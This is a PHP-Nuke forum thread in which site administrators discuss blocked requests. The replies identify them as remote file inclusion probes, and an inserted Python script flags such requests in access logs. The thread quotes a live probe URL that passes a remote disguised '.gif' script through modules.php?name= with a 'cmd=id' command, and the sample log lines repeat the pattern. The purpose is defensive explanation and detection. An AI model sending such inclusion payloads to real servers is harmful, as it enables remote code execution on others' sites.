Ravens PHP Scripts: Forums
 

 

Dauthus
Worker



Joined: Oct 07, 2003
Posts: 211

Posted: Sun Feb 12, 2006 1:36 pm

I keep getting a filter block on from a certain web page. Can anyone give me an idea of what the code on the page does?

Here's the sentinel info:

Quote:
User Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)

Query String: bootleghollow.com/modules.php?name=http://sca.postech.ac.kr/zboard/skin/buzzard_p4/img/btn_lists.gif?
&cmd=id

Get String: bootleghollow.com/modules.php?name=http://sca.postech.ac.kr/zboard/skin/buzzard_p4/img/btn_lists.gif?
&cmd=id

Post String: bootleghollow.com/modules.php


Here's the code that shows up on the following link (obviously not an image file). It is HTML code.

http://sca.postech.ac.kr/zboard/skin/buzzard_p4/img/btn_lists.gif

I didn't post the code because I thought it might kick in sentinel and get me banned.

Is this anything to worry about? Sentinel has been banning whoever tries to use the script. Just keeps adding different IP addresses to the htaccess files.

_________________
Vivere disce, cogita mori 
fkelly
Former Moderator in Good Standing



Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

Posted: Sun Feb 12, 2006 3:09 pm

Subject to validation by some of the experts here, what usually happens in Nuke is that when you move around from module to module or even within a module, everything goes through modules.php and where it goes next is determined by what follows the name= string that you listed above. Usually it is the "name" of another module within your site, say "news" or "weblinks" or "private_message" or the like. So if they formulate a string like the one you listed they are probably trying to execute a command on a different server where they can stick some kind of hack. They try to disguise that by putting the hack in a file with a gif extension but as you noted it's really html.

I believe Sentinel detects this as cross site scripting and bans it, as you noticed.
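
The check discussed in these posts, as an added example that is not part of the original thread and is not Sentinel's own code: it scans access-log lines for modules.php requests whose name= value is not a plain module name, and marks the ones that reference another server. The Apache-style log format, the rule that module names use only letters, digits and underscores, and the sample lines (constructed, with documentation addresses and a placeholder host) are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: module directory names use only letters, digits and underscores.
MODULE_NAME = re.compile(r"[A-Za-z0-9_]{1,64}")
# A URL scheme (or //host) in the value points the loader at another server.
REMOTE_REF = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//", re.IGNORECASE)
# Client address and request URI from an Apache-style access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify_name(value):
    """Return 'ok', 'remote-include' or 'invalid-name' for a name= value."""
    if MODULE_NAME.fullmatch(value):
        return "ok"
    if REMOTE_REF.match(value):
        return "remote-include"
    return "invalid-name"


def scan_request(uri):
    """Classify every name= value in a modules.php request URI."""
    parts = urlsplit(uri)
    if not parts.path.endswith("/modules.php"):
        return []
    # parse_qs percent-decodes, so an encoded http%3A%2F%2F is caught as well.
    values = parse_qs(parts.query, keep_blank_values=True).get("name", [])
    return [(v, classify_name(v)) for v in values]


def flag_log_lines(lines):
    """Return (client_ip, name_value, verdict) for every non-'ok' request."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m:
            ip, uri = m.groups()
            hits += [(ip, v, r) for v, r in scan_request(uri) if r != "ok"]
    return hits


# Constructed sample lines: one normal module request, two remote references.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Feb/2006:13:30:01 -0600] "GET /modules.php?name=News&file=article&sid=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Feb/2006:13:31:44 -0600] "GET /modules.php?name=http://remote.example/img/btn_lists.gif?&cmd=id HTTP/1.0" 403 312',
    '198.51.100.8 - - [12/Feb/2006:13:32:02 -0600] "GET /modules.php?name=http%3A%2F%2Fremote.example%2Fbtn.gif HTTP/1.0" 403 312',
]

if __name__ == "__main__":
    for hit in flag_log_lines(SAMPLE_LOG):
        print(hit)
```

The same allow-list test belongs in front of any include that is driven by a request parameter; log scanning only shows who has been probing.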
 
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

Posted: Sun Feb 12, 2006 10:40 pm

Yep, it is a code that is used to see if your server can be hacked. Ban the IPs, report the URL to the host of that site.

All times are GMT - 6 Hours
 